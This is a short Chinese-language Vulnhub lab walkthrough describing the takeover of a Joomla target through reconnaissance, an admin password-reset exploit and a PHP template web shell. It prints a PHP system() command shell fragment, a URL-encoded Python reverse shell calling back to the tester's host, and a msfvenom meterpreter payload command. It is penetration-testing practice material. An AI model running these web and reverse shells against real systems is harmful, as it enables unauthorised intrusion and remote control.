带妹玩转Vulnhub【十】

前言

国庆第三天！接下来会写的比较的粗略。

生活越来越无助，哪位师傅能施舍点活

开始

主机发现

netdiscover -r 192.168.43.0/24

端口扫描

nmap -A -p- -T4 192.168.43.7

渗透测试

从端口中可以看到很多信息，目标服务器开起来三个web服务，我们优先查看泄露信息最多的那个也就是8081端口，这是一个Joomlal开源框架，我们可以使用Joomscan工具进行漏洞扫描

可以看到存在许多的漏洞，我们需要关注的是admin密码修改的漏洞，查看对用的exp进行复现。

也比较简单，然后我们使用admin用户进行一个登录，在模版管理界面，发现这是一个php页面，所以我们可以修改模板，写入一个php的shell，从而获取webshell。

起初我是写入一个

";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "

"; die; } ?>

然后通过访问
192.168.43.7:8081/templates/beez/index.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.43.154%22%2C2333))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27
从而可以获取到webshell

不过后来我发现可以使用msfvenom生成一个php的webshell，命令如下msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.154 lport=4444 -f raw

设置如下的payload

可以成功的拿到webshell，接下来就需要进行一个提权，还是老套路，查看版本信息，然后选取可能的漏洞进行尝试。最终我们拿到了root

总结

假期过半，事情还未了